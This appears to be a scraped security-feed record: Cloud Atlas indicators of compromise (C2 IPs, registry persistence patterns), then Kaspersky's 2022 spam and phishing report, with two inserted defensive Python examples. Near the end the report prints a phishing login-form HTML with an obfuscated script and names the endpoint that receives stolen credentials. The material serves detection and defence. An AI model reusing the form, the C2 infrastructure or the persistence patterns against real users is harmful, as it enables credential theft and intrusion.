More interestingly, this intrusion set hasn't changed its modular backdoor, even [five years after its discovery](<https://securelist.com/cloud-atlas-redoctober-apt-is-back-in-style/68083/>).\n\n## IoCs\n\n#### Some emails used by the attackers\n\n * infocentre.gov@mail.ru\n * middleeasteye@asia.com\n * simbf2019@mail.ru\n * world_overview@politician.com\n * infocentre.gov@bk.ru\n\n#### VBShower registry persistence\n\n * Key : HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\\\[a-f0-9A-F]{8}\n * Value : wscript //B \"%APPDATA%\\\\[A-Za-z]{5}.vbs\"\n\n#### VBShower paths\n\n * %APPDATA%\\\\[A-Za-z]{5}.vbs.dat\n * %APPDATA%\\\\[A-Za-z]{5}.vbs\n * %APPDATA%\\\\[A-Za-z]{5}.mds\n\n#### VBShower C2s\n\n * 176.31.59.232\n * 144.217.174.57", "cvss3": {}, "published": "2019-08-12T10:00:58", "type": "securelist", "title": "Recent Cloud Atlas activity", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802"], "modified": "2019-08-12T10:00:58", "id": "SECURELIST:45427EE61DFCFA843ED5C3F7CAB026A1", "href": "https://securelist.com/recent-cloud-atlas-activity/92016/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-16T08:14:22", "description": "\n\n## Figures of the year\n\nIn 2022:\n\n * 48.63% of all emails around the world and 52.78% of all emails in the Russian segment of the internet were spam\n * As much as 29.82% of all spam emails originated in Russia\n * Kaspersky Mail Anti-Virus blocked 166,187,118 malicious email attachments\n * Our Anti-Phishing system thwarted 507,851,735 attempts to follow phishing links\n * 378,496 attempts to follow phishing links were associated with Telegram account hijacking\n\n## Phishing in 2022\n\n### Last year's resonant global events\n\nThe year 2022 saw cybercrooks try to profit from new film releases and premieres just as they always have. 
The bait included the most awaited and talked-about releases: the new season of Stranger Things, the new Batman movie, and the Oscar nominees. Short-lived phishing sites often offered to see the premieres before the eagerly awaited movie or television show was scheduled to hit the screen. Those who just could not wait were in for a disappointment and a waste of cash. The promises of completely free access to the new content were never true. By clicking what appeared to be a link to the movie, the visitor got to view the official trailer or a film studio logo. Several seconds into the "preview", the stream was interrupted by an offer to buy an inexpensive subscription right there on the website to continue watching. If the movie lover entered their bank card details on the fake site, they risked paying more than the displayed amount for content that did not exist and sharing their card details with the scammers.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132238/spam-phishing-report-2022-01.png>)\n\nSome websites that offered soccer fans free broadcasts of the FIFA World Cup in Qatar employed a similar scheme, but the variety of hoaxes aimed at soccer fans proved to be wider than that used by scammers who attacked film lovers. Thus, during the World Cup a brand-new scam appeared: it offered users to win a newly released iPhone 14 for predicting match outcomes. After answering every question, the victim was told that they were almost there, but there was a small commission to be paid before they could get their gadget. Of course, no prize ensued after the fee was paid.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132326/spam-phishing-report-2022-02.jpg>)\n\nSoccer fans chasing merchandise risked compromising their bank cards or just losing some money. Scammers created websites that offered souvenirs at low prices, including rare items that were out of stock in legitimate online stores. 
Those who chose to spend their money on a shady website risked never getting what they ordered.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132414/spam-phishing-report-2022-03.jpg>)\n\nWebsites that offered tickets to the finals were another type of soccer-flavored bait. Scammers were betting on the finals typically being the most popular stage of the competition, tickets to which are often hard to get. Unlike legitimate ticket stores, the fake resellers were showing available seats in every sector even when the World Cup was almost over. The vast selection of available seats should have alarmed visitors: real tickets would have been largely gone.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132716/spam-phishing-report-2022-04.png>)\n\nFake donation sites started popping up after the Ukraine crisis broke out in 2022, pretending to accept money as aid to Ukraine. These sites referenced public figures and humanitarian groups, offering to accept cash in cryptocurrency, something that should have raised a red flag in itself.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13132903/spam-phishing-report-2022-05.png>)\n\n### The pandemic\n\nThe COVID-19 theme had lost relevance by late 2022 as the pandemic restrictions had been lifted in most countries. At the beginning of that year, we still observed phishing attacks that used the themes of infection and prevention as the bait. For example, one website offered to issue users a COVID vaccination certificate in exchange for their British National Health Service (NHS) account credentials. 
Others offered the coveted Green Pass without vaccination.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141812/spam-phishing-report-2022-06.png>)\n\nScammers abused legitimate survey services by creating polls in the name of various organizations to profit from victims' personal, including sensitive, data. In another COVID-themed scheme, the con artists introduced themselves as the Direct Relief charity, which helps to improve the quality of life and healthcare in poorer regions. Visitors were invited to fill out a form to be eligible for $750 per week in aid for twenty-six weeks. The survey page said the "charity" found the victim's telephone number in a database of individuals affected by COVID-19. Those who wished to receive the "aid" were asked to state their full name, contact details, date of birth, social security and driver's license numbers, gender, and current employer, attaching a scanned copy of their driver's license. To lend an air of authenticity and to motivate the victim to enter valid information, the swindlers warned that the victim could be prosecuted for providing false information. The scheme likely aimed at identity theft: the illegal use of others' personal details for deriving profit. The cybercrooks might also use the data to contact their victims later, staging a more convincing swindle.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141841/spam-phishing-report-2022-07.png>)\n\n### Crypto phishing and crypto scams\n\nThe unabated popularity of cryptocurrency saw crypto scammers' interest in wallet owners' accounts growing, despite the fact that rates continued to drop throughout the year. Cybercriminals chased seed phrases, used for recovering access to virtual funds. 
By getting hold of a user's seed phrase, cybercriminals could gain access to their cryptocurrency balance.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13141926/spam-phishing-report-2022-08.png>)

In typical internet hoax manner, crypto scam sites invited visitors to get rich quick by paying a small fee. Unlike common easy-money scams, these websites asked for payment in cryptocurrency — which they promised to give away and which they were actually trying to steal. The "giveaways" were timed to coincide with events directly or indirectly associated with cryptocurrency. For example, one of the fake sites promised prizes on the occasion of Nvidia's thirtieth anniversary (the company is a major vendor of graphics processing units, which are sometimes used for crypto mining). Promoting cryptocurrency use was another pretext for the "giveaways". Users were invited to deposit up to 100 cryptocurrency units against a promise to refund twice that amount, purportedly to speed up digital currency adoption. In reality, the scheme worked the way any other internet hoax does: the self-professed altruists went off the radar once they had received the deposit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142443/spam-phishing-report-2022-09.png>)

### Compensation, bonus, and paid survey scams

Bonuses and compensation are hard to turn down in times of crisis and instability, but it is worth keeping in mind that "financial assistance" is frequently promised by con artists to swindle you out of your money.

"Promotional campaigns by major banks" were a popular bait in 2022. Visitors to a fraudulent web page were invited to receive a one-time payment or to take a service quality survey for a fee. Unlike the prizes offered in the crypto schemes above, these amounts were smaller: the equivalent of $30–40.
The cybercriminals used an array of techniques to lull victims into a false sense of security: company logos, assurances that the campaigns were legitimate, and detailed, lifelike descriptions of the offer. Similar "campaigns" were staged in the name of other types of organizations, for example the Polish finance ministry.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142523/spam-phishing-report-2022-10.png>)

Aid distributed by various governmental and nongovernmental organizations remained a popular fraud theme in 2022. For example, in Muslim countries, scammers promised to send charity packages, purportedly under a "Ramadan Relief" program aimed at helping low-income families during the Ramadan fast. The fasting period typically sees higher prices for food and household products, while observers buy more than they normally do and may face a shortage of money. Legitimate charities, such as [WF-AID](<https://wfaid.org/rrf/>), do operate Ramadan relief programs, and judging by the screenshot below, the fraudsters were pretending to represent that organization. An eye-catching picture of the organization's logo and huge boxes was accompanied by a list of the foodstuffs included in the aid package, with positive "recipient feedback" posted below the message. The victim was asked to make sure their name was on the list of recipients so they could get a package. This required providing personal data on the website and sending a link to the scam site to instant messaging contacts — nothing extraordinary for hoaxes like this. This way, the scammers both populate their databases and have victims spread links to their malicious resources for them.
In addition to that, they might ask the victim to cover the "shipping costs".

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142600/spam-phishing-report-2022-11.png>)

Growing utility rates and an increase in the price of natural resources prompted several governments to start discussing compensation for the population. Payout notices could arrive by mail, email, or text message. Cybercriminals attempted to take advantage of the situation by creating web pages that mimicked government websites and promised cash to cover utility payments or compensation for utility expenses. Visitors were sometimes asked to provide personal details under the pretext of checking that they were eligible, or simply to fill out a questionnaire. In Britain, con artists posing as a government authority promised to compensate electricity costs. The description of the one-time payout was copied from the official website of the authority, which did provide that type of compensation. After completing the questionnaire, the victim was asked to specify the electric utility whose services they were using and enter the details of the bank card linked to their account with the utility. The promise of £400 was supposed to make the victim drop their guard and share their personal information.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142636/spam-phishing-report-2022-12.png>)

In Singapore, scammers offered a refund of water supply costs, purportedly because of double billing.
An energy or resource crisis was not used as a pretext in this particular case, but refunds were still offered in the name of the water supply authority.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142706/spam-phishing-report-2022-13.png>)

### Fake online stores and large vendor phishing

We see fake websites that imitate large online stores and marketplaces year after year, and 2022 was no exception. Phishing attacks targeted both the customers of globally known retailers and those of regional players. An attack often started with the victim receiving a link to a certain product supposedly offered at an attractive price, by email, in an instant messaging app, or on a social network. Those who fell for the trick could lose access to their accounts, have their bank card details stolen, or waste the money they wanted to spend on the dirt-cheap item.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142737/spam-phishing-report-2022-14.png>)

"Inside information" about "private sales" was also used as a lure. For example, a web page that copied the appearance of a Russian marketplace promised discounts of up to 90% on all items listed on it. The page design did look credible, with the only potential red flags being the very low prices and the URL in the address bar not matching the official one.

Many large vendors, notably in the home appliances segment, announced in early spring that they would be pulling out of Russia, which caused a spike in demand. This was reflected in the threat landscape, with fake online stores offering home appliances popping up all over the Russian segment of the internet (also called Runet). Large retailers being out of stock, combined with unbelievably low prices, made these offers especially appealing.
The risk associated with making a purchase was losing a substantial amount of money and never receiving what was ordered.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142817/spam-phishing-report-2022-15.jpg>)

### Hijacking of social media accounts

Users of social media have increasingly focused on privacy lately. That said, curiosity is hard to contain: people want to check out who has been following them, but without the other party knowing. Cybercriminals who were after their account credentials offered victims a way to have their cake and eat it too by using some new social media capability. A fake Facebook Messenger page promised to install an update that could change the user's appearance and voice during video calls and track who had been viewing their profile, among other features. To get the "update", the victim was asked to enter their account credentials, which the scammers immediately took over.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142852/spam-phishing-report-2022-16.png>)

Many Instagram users dream about the Blue Badge, which stands for a verified account and is typically reserved for large companies or media personalities. Cybercriminals decided to take advantage of that exclusivity, creating phishing pages that assured visitors their verified status had been approved and all they needed to do was enter their account logins and passwords.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142919/spam-phishing-report-2022-17.png>)

Russia blocked access to both Facebook and Instagram in March 2022, which sent the popularity of Russian social networks and Telegram skyrocketing. This increased usage meant the users' risk of losing personal data was now higher, too. "Well-wishers" who operated scam sites offered to check whether Russian social media contained any embarrassing materials on the victim.
The scam operators told users that damaging information could be found about every third user of a social network by running a search. If the user agreed to have a search run for them, they were told that a certain amount of dirty linen had indeed been found. In reality, there was no search — the scammers simply stole the credentials they had requested for the check.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13142944/spam-phishing-report-2022-18.png>)

One of the added risks of social media phishing is scammers getting access to both the social media account itself and any linked services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143155/spam-phishing-report-2022-19.png>)

The Telegram Premium status provides a range of benefits, from an ad-free experience to the ability to block incoming voice messages, but the subscription costs money. Scammers offered to "test" a Premium subscription free of charge, or simply promised to give one away for free, if the victim entered their Telegram user name and password or a verification code sent by the service, which was exactly what the cybercrooks were after.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143228/spam-phishing-report-2022-20-EN.png>)

One more phishing campaign targeting Telegram users was timed to coincide with the New Year's celebrations. Scammers created a page on the telegra.ph blogging platform that posted a gallery of children's drawings, encouraging users to vote for their favorites. Scammers sent links to that page from hacked accounts, asking users to vote for their friends' kids' works. Those who took the bait were directed to a fake page with a login form on it.
The cybercriminals were betting that users would go straight to voting without checking the authenticity of the drawings, which had been copied from various past years' competition pages, since requests to vote for friends' kids are common before public holidays.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143725/spam-phishing-report-2022-21.jpg>)

The Telegram auction platform named Fragment went live in October 2022, selling unique usernames. You can become a user by linking your Telegram account or TON wallet. Scammers who were after those account details sent out links to fake Fragment pages. A visitor who tried to buy a username from the fake website was asked to log in. If the victim entered their credentials, the scam operators immediately grabbed them.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143807/spam-phishing-report-2022-22.png>)

## Spam in 2022

### The pandemic

Unlike phishing, COVID-themed spam is still a thing. Most of it is "Nigerian-type" scams: millionaires dying from COVID bequeathing their money to treatment and prevention efforts and to improving the lives of those who have recovered, or Mark Zuckerberg running a special COVID lottery where one can win a million euros even without being a Facebook user. Recipients are told that they can claim some IMF money left unallocated because of the pandemic.
Others are offered hefty amounts under an anti-recession assistance program.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13143915/spam-phishing-report-2022-23.png>)

The amount of spam exploiting the coronavirus theme in some way dropped noticeably during 2022: at the beginning of the year, we were blocking a million of these emails per month, but the figure had fallen threefold by year-end.

### Contact form spam

The year 2022 saw cybercriminals abuse contact forms for spam more frequently. In a typical scheme of this kind, scammers find websites with registration, contact, or support request forms that do not require the user to be logged in to submit and do not validate the data entered. In some cases, they insert a scam message with a hyperlink in the login or name fields; in others, they add a longer text with images to the message field. The attackers then enter victims' email addresses in the contact fields and submit the form. When receiving a message via a registration or contact form, most websites reply to the user's email address that their request was received and is being processed, their account has been created, and so on. As a result, the person gets an automated reply from an official address of a legitimate organization, containing unsolicited advertisements or a scam link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13144349/spam-phishing-report-2022-24.png>)

Most scam messages offer compensation or a prize to the recipient. For example, a spam email targeting Russian users promised the equivalent of $190–4200 in VAT refunds. To get the money, the victim was invited to open the link in the message. This scheme is a classic: the linked web page requests that the user pay a commission of under a dozen dollars, which is insignificant compared to the promised refund.
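A defensive counterpart to the contact-form abuse described above, as an added example that is not Kaspersky's code: it flags submissions whose name field cannot be a name (a link, a lure paired with a link) and never repeats submitter text in the confirmation email, so the site cannot be turned into a relay. The `Submission` type, the patterns and the two sample submissions are constructed for illustration.

```python
"""Contact-form handling hardened against contact-form spam.

Added example, not Kaspersky's code. The attacker submits a legitimate site's
form with the victim's address and a scam text (usually with a link) in the
name field, so the site's own confirmation email delivers the scam. Two
defences are shown: quarantine submissions whose name field cannot be a name,
and never echo submitter text in the auto-reply. All samples are constructed.
"""
import re
from dataclasses import dataclass, field

# A person's name never contains a URL scheme, "www." or a bare domain.
URL_RE = re.compile(r"https?://|www\.|\b[\w-]+\.[a-z]{2,}\b", re.IGNORECASE)
# Money lures the report lists as typical for this scam.
LURE_RE = re.compile(r"\b(prize|refund|compensation|bonus|winner)\b", re.IGNORECASE)
MAX_NAME_LEN = 64


@dataclass
class Submission:
    name: str
    email: str
    message: str


@dataclass
class Decision:
    action: str                       # "accept" or "quarantine"
    reasons: list = field(default_factory=list)
    reply_body: str = ""              # empty when nothing is sent


def suspicious_reasons(sub: Submission) -> list:
    """Heuristics over the free-text fields; any hit means manual review."""
    reasons = []
    if URL_RE.search(sub.name):
        reasons.append("name field contains a link or domain")
    if len(sub.name) > MAX_NAME_LEN:
        reasons.append("name field is implausibly long")
    if "\n" in sub.name or "\r" in sub.name:
        reasons.append("name field contains line breaks")
    if LURE_RE.search(sub.message) and URL_RE.search(sub.message):
        reasons.append("message pairs a money lure with a link")
    return reasons


def naive_auto_reply(sub: Submission) -> str:
    """The pattern the scammers rely on: the reply quotes whatever was typed."""
    return (f"Hello {sub.name},\n\nThank you for your message:\n> {sub.message}\n\n"
            "We will be in touch.\n")


def safe_auto_reply(ticket_id: str) -> str:
    """Confirmation carrying only site-generated text and a reference number."""
    return ("Hello,\n\nWe have received your request and will reply shortly.\n"
            f"Reference: {ticket_id}\n"
            "If you did not contact us, you can ignore this email.\n")


def handle_submission(sub: Submission, ticket_id: str) -> Decision:
    reasons = suspicious_reasons(sub)
    if reasons:
        # Hold for review and send nothing: the address given may belong to a
        # third party who never visited the site.
        return Decision("quarantine", reasons)
    return Decision("accept", [], safe_auto_reply(ticket_id))


# Constructed samples: a genuine enquiry and a VAT-refund lure aimed at a third party.
LEGIT = Submission("Jane Example", "jane@customer.example", "Do you ship to Germany?")
SCAM = Submission(
    "Your $4200 VAT refund is ready: http://refund-claim.example/vat",
    "victim@victim.example",
    "Claim your refund within 24 hours at http://refund-claim.example/vat",
)

if __name__ == "__main__":
    print(naive_auto_reply(SCAM))             # the scam link rides in the site's own email
    print(handle_submission(SCAM, "T-1001"))  # quarantined, nothing sent
    print(handle_submission(LEGIT, "T-1002").reply_body)
```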
We observed many varieties of contact form money scams: from fuel cards to offers to make money on some online platform.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13145016/spam-phishing-report-2022-25.png>)

Scammers took advantage of forms on legitimate sites all around the world. Where spam email in Russian typically played on "prizes" or "earning money", messages in other languages, in addition to offering "prizes", encouraged users to visit "dating sites" — in fact populated by bots — where the victims would no doubt be asked to pay for a premium account.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150322/spam-phishing-report-2022-26.png>)

We blocked upward of a million scam emails sent via legitimate forms in 2022.

### Blackmail in the name of law enforcement agencies

Extortion spam is nothing new. In such emails, attackers usually claim that the recipient has broken the law and demand money. In 2022, these mailings not only continued but also evolved. For example, there was virtually no text in the messages: the user was either asked to open an attached PDF file to find out more, or they received threats in the form of an image containing text. In addition, the geography of the mailings widened in 2022.

The essence of the message, as in similar emails sent earlier, was that a criminal case was going to be opened against the recipient for allegedly visiting sites containing child pornography.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150404/spam-phishing-report-2022-27.png>)

To avoid serious consequences, the attackers urged the victim to respond to the sender as soon as possible and "settle the matter". Most likely, the scammers would ask in further correspondence for a certain amount of money to be paid to have the victim's name removed from the "criminal case".
In 2022, we blocked over 100,000 blackmail emails in various countries and languages, including French, Spanish, English, German, Russian, and Serbian.

### Exploiting the news

Spammers constantly use major world events in their fraudulent schemes. The 2022 geopolitical crisis was no exception. Throughout the year, we saw mailings aimed at English-speaking users proposing money transfers, usually to a Bitcoin wallet, to help the victims of the conflict in Ukraine. Scammers often demand transfers to Bitcoin wallets, as it is more difficult to trace the recipient of a cryptocurrency transaction than that of a bank transfer. Blackmail demanding payment in cryptocurrency used to prevail in spam. Now, attackers have started collecting Bitcoin for charity.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150431/spam-phishing-report-2022-28.png>)

The news agenda was also used in other scam mailings. For example, in early July, our solutions blocked 300,000 emails in which fraudsters requested help on behalf of a Russian millionaire who allegedly wanted to invest money and avoid sanctions. Another mailing claimed that the European Commission had decided to give away a fund created by Russian oligarchs, and that the email recipient might be lucky enough to get a piece of this pie.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13150458/spam-phishing-report-2022-29.jpg>)

More and more "business offers" are appearing among spam mailings, and they exploit the current news agenda. Because of the economic sanctions in 2022, enterprising businessmen offered replacements for goods and services from suppliers who had left the Russian market. For example, spammers actively advertised the services of a company transporting people to Russia.
The email text emphasized the fact that many transport companies had refused to provide such services.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153541/spam-phishing-report-2022-30.png>)

There were also spam mailings in which various companies offered to replace popular international software with Russian equivalents or solutions developed in third countries. In addition, there were spam offers of intermediary services to open a company or bank account in neighboring countries, such as Armenia, as well as offers of assistance in accepting payments from foreign partners.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153600/spam-phishing-report-2022-31.png>)

The shortage of printer paper in Russia in March and April 2022 spawned a wave of related ads offering paper at discount prices.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153622/spam-phishing-report-2022-32.png>)

Spammers in 2022 also actively marketed their promotional mailing services as an alternative to advertising on platforms that had become unavailable, such as Instagram. For example, in April we blocked around a million such mailings.

Against the backdrop of sanctions and the accompanying disruption of supply chains, there was an increase in spam offering goods and services from Chinese suppliers. In 2022, our filter blocked more than 3.5 million emails containing such offers, and their number kept growing, from around 700,000 in the first quarter to more than a million in the fourth.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153708/spam-phishing-report-2022-33.png>)

### Spam with malicious attachments

Employees shifting to remote work during the pandemic and the associated growth of online communications spurred the active development of various areas of phishing, both mass and targeted.
Attackers have become more active in imitating business correspondence, targeting not only HR specialists and accountants, as before the pandemic, but also employees in other departments. In 2022, we saw an evolution of malicious emails masquerading as business correspondence. Attackers actively used social engineering techniques in their emails, adding signatures with logos and information from specific organizations, creating a context appropriate to the company's profile, and using business language. They also actively exploited the current news agenda and mentioned real employees of the company supposedly sending the emails. Spammers disguised their messages as internal company correspondence, business correspondence between different organizations, and even notifications from government agencies.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153731/spam-phishing-report-2022-34.png>)

Disguising malicious emails as business correspondence became a major trend in malicious spam in 2022. Attackers tried to convince the recipient that it was a legitimate email, such as a commercial offer, a request for the supply of equipment, or an invoice for the payment of goods. For example, throughout the year we encountered the following scheme. Attackers gained access to real business correspondence (most likely by stealing it from previously infected computers) and sent malicious files or links to all of its participants in reply to the previous email. This trick makes it harder to spot malicious emails, and the victim is more likely to fall for it.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153756/spam-phishing-report-2022-35.png>)

In most cases, either the [Qbot](<https://securelist.com/qakbot-technical-analysis/103931/>) Trojan or [Emotet](<https://securelist.com/emotet-modules-and-recent-attacks/>) was loaded when the malicious document was opened.
Both can be used to steal user data, collect information about the corporate network, and spread additional malware, such as ransomware. Qbot also allows attackers to gain access to emails and steal them for use in further attacks.

Mailings imitating notifications from various ministries and other government organizations have become more frequent in Runet. The emails were often designed to take into account the specific activities of the organizations they were impersonating. The sender addresses copied the logic of email addresses in the relevant agencies, and the malicious attachment was disguised as some kind of specialized document, such as "key points of the meeting". For example, malicious code was found in one of these mailings that exploited a vulnerability in the Equation Editor module, the formula editor in Microsoft Office.

The perpetrators did not ignore the news agenda either. In particular, malware was distributed under the guise of a call-up notice "as part of partial mobilization" or as a "new solution" to safeguard against possible threats on the internet "caused by hostile organizations".

In the second case, the program installed on the victim's computer was in fact a crypto-ransomware Trojan.

## Two-stage spear phishing using a known phish kit

In 2022, we saw an increase in spear (or targeted) phishing attacks targeting businesses around the world. In addition to typical campaigns consisting of one stage, there were attacks in several stages. In the first email, scammers posing as a potential client asked the victim to provide information about its products and services.
After the victim responds to this email, the attackers start a phishing attack.

Key facts:

 * Attackers use fake Dropbox pages created using a well-known phishing kit
 * The campaign targets the sales departments of manufacturers and suppliers of goods and services
 * Attackers use SMTP IP addresses and _From_ domains provided by Microsoft Corporation and Google LLC (Gmail)

### Statistics

The campaign began in April 2022, with malicious activity peaking in May, and ended by June.

_Number of emails related to a two-step targeted campaign detected by Kaspersky solutions ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13161029/01-en-spam-report-2022-diagrams.png>))_

### How a phishing campaign unfolds

Attackers send an email in the name of a real trade organization requesting more information about the victim company's products. The email text looks plausible and has no suspicious elements, such as phishing links or attachments. A sender's email address in a free domain, like gmail.com, may raise doubts. The email in the screenshot below is sent from an address in this domain, and the company name in the _From_ field is different from the name in the signature.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153835/spam-phishing-report-2022-36.jpg>)

**_Example of the first email_**

It is worth noting that the use of free domains is not typical for spear phishing in the name of organizations, because such domains are rarely used in business. Most often in targeted attacks, attackers either use [spoofing of the legitimate domain](<https://securelist.com/email-spoofing-types/102703/>) of the organization they are pretending to be, or register domains similar to the original one. In addition, Google and Microsoft are pretty quick to block email addresses spotted sending spam.
This is the most likely reason why attackers used different addresses in the _From_ header (where the email came from) and the _Reply-to_ header (where the reply will go when clicking "Reply" in your email client). This means the victim responds to another address, which may be located in another free domain, such as outlook.com. The address in the _Reply-to_ header is not used for sending spam, and correspondence with it is initiated by the victim, so it is less likely to be blocked quickly.

After victims respond to the first email, attackers send a new message asking them to go to a file-sharing site and view a PDF file with a completed order, which can be found via the link.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153858/spam-phishing-report-2022-37.jpg>)

**_An email with a phishing link_**

By clicking the link, the user is taken to a fake site generated by a well-known phishing kit. It is a fairly simple tool that generates phishing pages to steal credentials for specific resources. Our solutions blocked fake WeTransfer and Dropbox pages created with this kit.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153925/spam-phishing-report-2022-38.jpg>)

**_A fake WeTransfer page created using the same phish kit as the target campaign sites_**

In the phishing campaign described above, the phishing site mimics a Dropbox page with static file images and a download button.
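The first-stage email carries no link or attachment, so the header traits described above (an organization writing from a free-mail domain, a _Reply-to_ on a different domain, a _From_ company name absent from the signature) are what a mail filter can act on. The following is an added detection example, not part of the original report; the two raw messages are constructed samples and the free-mail domain list is an assumption to adapt to your environment.

```python
"""Score first-stage spear-phishing emails by the header traits the report describes.

Added example, not Kaspersky's code. The constructed SUSPICIOUS message mirrors
the campaign: organizational display name on a gmail.com sender, Reply-To on
outlook.com, a signature naming a different company, and no links or attachments.
"""
import email
from email.utils import parseaddr

# Assumption: providers where anyone can register an address; extend as needed.
FREE_MAIL_DOMAINS = {"gmail.com", "outlook.com", "hotmail.com", "yahoo.com"}


def _domain(addr: str) -> str:
    return addr.rpartition("@")[2].lower()


def _plain_body(msg) -> str:
    """Return the first text/plain part decoded, or an empty string."""
    for part in msg.walk():          # walk() yields the message itself when not multipart
        if part.get_content_type() == "text/plain":
            return part.get_payload(decode=True).decode("utf-8", "replace")
    return ""


def analyze_message(raw: bytes) -> dict:
    msg = email.message_from_bytes(raw)
    from_name, from_addr = parseaddr(msg.get("From", ""))
    _, reply_addr = parseaddr(msg.get("Reply-To", ""))
    from_dom, reply_dom = _domain(from_addr), _domain(reply_addr)
    findings = []

    # 1. A company writing from a free mail provider is unusual in B2B mail.
    if from_name and from_dom in FREE_MAIL_DOMAINS:
        findings.append("organizational display name on free-mail From domain " + from_dom)

    # 2. Replies are diverted elsewhere: the From address may be blocked soon,
    #    while the Reply-To address only ever receives victim-initiated mail.
    if reply_addr and reply_dom != from_dom:
        findings.append("Reply-To domain %s differs from From domain %s" % (reply_dom, from_dom))

    # 3. The company named in From does not appear in the signature block.
    sig_lines = [ln for ln in _plain_body(msg).splitlines() if ln.strip()][-5:]
    if from_name and from_name.lower() not in "\n".join(sig_lines).lower():
        findings.append("display name %r is absent from the signature" % from_name)

    return {"from": from_addr, "reply_to": reply_addr,
            "findings": findings, "score": len(findings)}


# Constructed sample resembling the campaign's first-stage email.
SUSPICIOUS = b"""\
From: "Northwind Trading GmbH" <northwind.purchasing@gmail.com>
Reply-To: <northwind.purchasing@outlook.com>
To: sales@supplier.example
Subject: Request for product information
Content-Type: text/plain; charset=utf-8

Dear Sales Team,

We are interested in your product range. Could you send us
your catalogue and price list for bulk orders?

Best regards,
Maria Example
Purchasing Manager
Contoso Industrial Supplies Ltd
"""

# Constructed benign request from a corporate domain, signed consistently.
BENIGN = b"""\
From: "Fabrikam Ltd" <purchasing@fabrikam.example>
To: sales@supplier.example
Subject: RFQ for part XY-1
Content-Type: text/plain; charset=utf-8

Hello,

Please quote 500 units of part XY-1.

Kind regards,
Tom Example
Fabrikam Ltd
"""

if __name__ == "__main__":
    for label, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(label, analyze_message(raw))
```

A score of two or more on an inbound enquiry is a reasonable trigger for holding the thread for review before anyone replies, since the second stage only starts once the victim answers.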
After clicking any element of the interface, the user is taken to a fake Dropbox login page that requests valid corporate credentials.

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13153950/spam-phishing-report-2022-39.png>)

**_A fake Dropbox page_**

[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2023/02/13154022/spam-phishing-report-2022-40.jpg>)

**_Login page with a phishing form_**

When victims attempt to log in, their usernames and passwords are sent to https://pbkvklqksxtdrfqkbkhszgkfjntdrf[.]herokuapp[.]com/send-mail.

```html
<form name="loginform">
  <div class="form-group">
    <label for="">Email Address</label>
    <input type="email" id="email" class="form-control" name="email" placeholder="email Address">
    <div class="email-error"></div>
  </div>
  <div class="form-group">
    <label for="">Password</label>
    <input type="password" id="password" class="form-control" name="password" placeholder="Password">
    <div class="password-error"></div>
  </div>
  <div class="form-group btn-area">
    <button class="download-btn" id="db" type="submit">Download</button>
  </div>
</form>
</div>
<script src="https://firebasestorage.googleapis.com/v0/b/linktopage-c7fd6.appspot.com/o/obfuscated.js?alt=media&token=1bb73d28-53c8-4a1e-9b82-1e7d62f3826b"></script>
```

**_HTML representation of a phishing form_**

### Victims

